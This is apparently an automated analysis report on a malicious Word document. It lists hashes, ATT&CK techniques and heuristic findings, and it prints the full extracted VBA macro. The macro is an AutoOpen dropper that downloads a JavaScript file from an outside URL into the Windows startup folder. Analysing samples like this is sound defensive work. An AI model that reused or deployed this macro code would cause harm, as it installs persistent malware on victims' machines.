Office (OLE) malware analysis — malicious · 620b091c4d2e1da6

MALICIOUS

Office (OLE)

103.5 KB Created: 2020-03-04 03:42:00 Authoring application: Microsoft Office Word First seen: 2020-08-25

MD5: edb837754be04f3cd8b8a0c3c5d6acfd SHA-1: 1a2bc9b5220ec132942e561f631204cb3f934142 SHA-256: 620b091c4d2e1da67922cba308d9d88c2e7d9de10bda08384f597f3cb1e2e3cd

330 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1037.001 Boot or Logon Initialization: Script-Based

The sample contains a VBA macro that leverages WScript.Shell and Scripting.FileSystemObject to download a JavaScript file from 'https://immortalshield.com/read.php' and save it to the startup folder as 'c2b72f86b8ca51642c4a902887830d3e.js'. This script is likely intended to establish persistence or download additional malicious payloads. The use of AutoOpen and shell execution tokens indicates a malicious intent to run code upon document opening.

Heuristics 10

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set shellobj = CreateObject("wscript.shell")
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    .write objhttpinvoice.responsebody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set shellobj = CreateObject("wscript.shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://immortalshield.com/read.php Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1077 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1077 bytes
SHA-256: `f912d3e56a86927006ee6f32e3838ad346113cad41f47701b8b47c4bedf56805`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() Set shellobj = CreateObject("wscript.shell") Set objfsoinvoice = CreateObject("scripting.filesystemobject") invoice = shellobj.specialfolders("startup") & "\" strlink = "https://immortalshield.com/read.php" strsaveto = invoice & "c2b72f86b8ca51642c4a902887830d3e.js" Set objhttpinvoice = CreateObject("msxml2.xmlhttp") objhttpinvoice.Open "get", strlink, False objhttpinvoice.send If objfsoinvoice.fileexists(strsaveto) Then Set objhttpinvoice = Nothing Else Dim objstreaminvoice Set objstreaminvoice = CreateObject("adodb.stream") With objstreaminvoice .Type = 1 .Open .write objhttpinvoice.responsebody .savetofile strsaveto .Close End With Set objstreaminvoice = Nothing End If End Sub

SHA-256: f912d3e56a86927006ee6f32e3838ad346113cad41f47701b8b47c4bedf56805

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

Set shellobj = CreateObject("wscript.shell")
Set objfsoinvoice = CreateObject("scripting.filesystemobject")
invoice = shellobj.specialfolders("startup") & "\"
strlink = "https://immortalshield.com/read.php"
strsaveto = invoice & "c2b72f86b8ca51642c4a902887830d3e.js"
Set objhttpinvoice = CreateObject("msxml2.xmlhttp")
objhttpinvoice.Open "get", strlink, False
objhttpinvoice.send

If objfsoinvoice.fileexists(strsaveto) Then
   Set objhttpinvoice = Nothing
Else
Dim objstreaminvoice
Set objstreaminvoice = CreateObject("adodb.stream")
With objstreaminvoice
    .Type = 1
    .Open
    .write objhttpinvoice.responsebody
    .savetofile strsaveto
    .Close
End With
Set objstreaminvoice = Nothing
End If

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.